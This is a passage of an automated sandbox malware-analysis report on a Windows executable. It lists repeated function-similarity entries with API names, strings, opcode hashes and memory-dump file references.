                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateThread_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                      • String ID: Press Key$Select Key
                                                                                                                                                                                                      • API String ID: 2430190256-2074042277
                                                                                                                                                                                                      • Opcode ID: 5b209fc4513323ca8da6c0f9494d1306fae5cf43531030bf689f9ac43c021c36
                                                                                                                                                                                                      • Instruction ID: 8d9b4aad09c346ba9cbc0f4d6c98882259d7c0abfae0393d499d81506f8ba471
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b209fc4513323ca8da6c0f9494d1306fae5cf43531030bf689f9ac43c021c36
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7A31B562A18682C1FB508B54E49237E6711FF89BA4F505239EA9E47AFDDFBCD484C700
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Context$CompositionReleaseWindow
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 244372355-3916222277
                                                                                                                                                                                                      • Opcode ID: 14749f2e68473d5d6ca4be5c72f8be5447fe3472af0755b27ec1b9a61fe36adf
                                                                                                                                                                                                      • Instruction ID: b5cf31114730cbb24cac08f6c558dea38bd773a5c8e8b535173d9896160315ba
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 14749f2e68473d5d6ca4be5c72f8be5447fe3472af0755b27ec1b9a61fe36adf
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2C012135A09B41C6EA608F16A555269B7A1FF8CFD4F084139DE8D87769EF3CE444CB40
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __current_exception__current_exception_contextterminate
                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                      • API String ID: 2542180945-1018135373
                                                                                                                                                                                                      • Opcode ID: 8a473f447337ef945c40d2bb0789044ac61d4c89af2c61f0201678ab2b843443
                                                                                                                                                                                                      • Instruction ID: 3d11a5af49f6b9bd4ed8f61e1e0ea9d08c3fac9cde0302dd0656c9efb2406db8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8a473f447337ef945c40d2bb0789044ac61d4c89af2c61f0201678ab2b843443
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2F0E237609B48CAC7259F61E8920AC3764FB4CB98B4A5135FA4D87B69CF38D899C700
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: freemallocmemcpy
                                                                                                                                                                                                      • String ID: %.*s$#CLOSE$#COLLAPSE
                                                                                                                                                                                                      • API String ID: 3056473165-830562872
                                                                                                                                                                                                      • Opcode ID: 93b02e3d0b5e85f3b6f415d32533d60ca59e2b990f45402d253789a5d223e26a
                                                                                                                                                                                                      • Instruction ID: 0008faeebf244eba287d143d4dd0dfbfbce514a705ea8cec87c2885346245010
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 93b02e3d0b5e85f3b6f415d32533d60ca59e2b990f45402d253789a5d223e26a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6632D332A04A85DBE719CB36C5412E8B7A0FF5D744F088739DB29976A9DF38B464CB40
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: mallocmemcpy$free
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 798594229-0
                                                                                                                                                                                                      • Opcode ID: 81a325c45dea29d3feae1001b346cf31d810afd4fe8ad6b8985023bc76e978e9
                                                                                                                                                                                                      • Instruction ID: b3f25bbf0f3f76d1c1169077ea58ace9359756d5c62ae35e4dacafbc3bf9de99
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 81a325c45dea29d3feae1001b346cf31d810afd4fe8ad6b8985023bc76e978e9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4418D32609B82C6EB508F65A5411ACB3A1FF88B94F18523ADE5DC77A9DF38E485C710
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: powf
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3445610689-0
                                                                                                                                                                                                      • Opcode ID: a344dcbf9793c9cf5e304d0889a832391ed2d92f708022cb1225239f5b48ac29
                                                                                                                                                                                                      • Instruction ID: 508b29d6fa2f89b0a20ab74b00a5fcdf6040c4ba31102ce0c067d5da5e107be7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a344dcbf9793c9cf5e304d0889a832391ed2d92f708022cb1225239f5b48ac29
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0AE1D532D08689C5E2139A3750431BDB390BF6E784F19A736ED68B72B6DF697581CB00
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: powf
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3445610689-0
                                                                                                                                                                                                      • Opcode ID: c3a05892b9fbfce1c0fae80fa352f2484f5b61a7fe1e395c90acc4d0a6b37165
                                                                                                                                                                                                      • Instruction ID: 0e31fe07da3db56c2e9b465c2e5a668f1c95927b360096bbdeff538f21e7eef1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c3a05892b9fbfce1c0fae80fa352f2484f5b61a7fe1e395c90acc4d0a6b37165
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 58E19822D08A8DC6E253963750431F9A250FF7E385F19AB36ED58B75B5DF297181CB00
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: powf
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3445610689-0
                                                                                                                                                                                                      • Opcode ID: 3629add72ceeceeb697877346239c254e8a5229519e0fab404850746d4966d57
                                                                                                                                                                                                      • Instruction ID: a92b9832c3518f0c2427446f260de9161bcf8e8b00141c0cca1fa06f5fa790b7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3629add72ceeceeb697877346239c254e8a5229519e0fab404850746d4966d57
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B0E1C522D08AC985E263967650432BAB350BF6E3C5F189736FE48B72B7DF297585C700
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: free
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1294909896-0
                                                                                                                                                                                                      • Opcode ID: 44b16c2df660a442b6c2ad2a99b6511d3dc5d833735ddbf11cda490c78777d3c
                                                                                                                                                                                                      • Instruction ID: 795f65f65f9d7626a1a992acc9caa6846112112de963683eec39286e6d8d0cf8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 44b16c2df660a442b6c2ad2a99b6511d3dc5d833735ddbf11cda490c78777d3c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 76112624A4A682C5FE698F91E85133422A0FF49F40F0D943DC90DD73BAEF2CA904C794
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: memchr
                                                                                                                                                                                                      • String ID: %*s%.*s$ %.*s$--------------------------------
                                                                                                                                                                                                      • API String ID: 3297308162-2326682469
                                                                                                                                                                                                      • Opcode ID: 07c145e9c74eff4cc9826f19840dde911c580183a0ea3b7411d96eda4c53ca7e
                                                                                                                                                                                                      • Instruction ID: b00e8bf756d316b744b6b51c0ded859cf2e09953f1a6f32bae2a9e00bad68353
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 07c145e9c74eff4cc9826f19840dde911c580183a0ea3b7411d96eda4c53ca7e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D3E1B032E04A85C5E751CB35D0467F873A4FF69788F09933ADA58B72A9EF78A085C700
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy__std_exception_destroy
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2138705365-0
                                                                                                                                                                                                      • Opcode ID: 668f00d90cb3f41bded2cea3d6defd2cb9b7c570fb216ce5133a26483c3839af
                                                                                                                                                                                                      • Instruction ID: f1a8b5113a6e588e2c9eb619aa1fc2cdef27bd6de8dac2c056498fba78ffc432
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 668f00d90cb3f41bded2cea3d6defd2cb9b7c570fb216ce5133a26483c3839af
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF815972A05A81D1EB049F29E49536D3366FF48F88FA0903ADB4D47A6DEF78D895C340
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ceilffloorf
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 300201839-0
                                                                                                                                                                                                      • Opcode ID: 4f46f875f46fa92d8de6cfc2ddb4c190dd6f8b07dfb4b1f5623ba0800429d927
                                                                                                                                                                                                      • Instruction ID: fda5bdb370f227fd957712296335d21e70088a283eca95e086547892211b9184
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f46f875f46fa92d8de6cfc2ddb4c190dd6f8b07dfb4b1f5623ba0800429d927
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F51BC3291CBD185D3628F3691422B9B7A0BF6D381F158336EA8867666EF3DD491CB00
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000004,?,00007FF68B4B7151), ref: 00007FF68B4C94D3
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000004,?,00007FF68B4B7151), ref: 00007FF68B4C9526
                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000004,?,00007FF68B4B7151), ref: 00007FF68B4C9530
                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68B4C957C
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1775671525-0
                                                                                                                                                                                                      • Opcode ID: d133dc5d97f13755ec6f0bf77e7e0991687a12e1d00cb0fdcd74b073fba185a3
                                                                                                                                                                                                      • Instruction ID: 95fb2a7c3bdb6fb9761b3f29ed0a94142a8b2d93f48595122214ab6cd7bb03f5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d133dc5d97f13755ec6f0bf77e7e0991687a12e1d00cb0fdcd74b073fba185a3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C41FF62B08A51E1ED05DB16E12917D6291BF48FE4F944339DA6D83BE9EE3CE449C304
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00007FF68B4B29C8), ref: 00007FF68B4C9E61
                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00007FF68B4B29C8), ref: 00007FF68B4C9E74
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00007FF68B4B29C8), ref: 00007FF68B4C9EE7
                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68B4C9EF4
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1775671525-0
                                                                                                                                                                                                      • Opcode ID: 41e4098f6903ffb1c59d0cd2e0f37de097f7a6c99d53bd332743e1f6a4a54820
                                                                                                                                                                                                      • Instruction ID: fc3e6c75f259a9f55ed9713956ab1bb9114430269bb7c603717cc88b9ab3627f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 41e4098f6903ffb1c59d0cd2e0f37de097f7a6c99d53bd332743e1f6a4a54820
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2B41CE62714A86E1EA14CB25D4652A96360FF48FE0F548639DB6D83BE9DF3CE099C300
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1155477157-0
                                                                                                                                                                                                      • Opcode ID: 047dd170d9da74deae2a54082c9d36e321ba8e479bfb212ec63d5f305555a14f
                                                                                                                                                                                                      • Instruction ID: 4496366ddb1785f664f300ce7b64638cf0e592ce2a6d8fa0e767f35ecc59984f
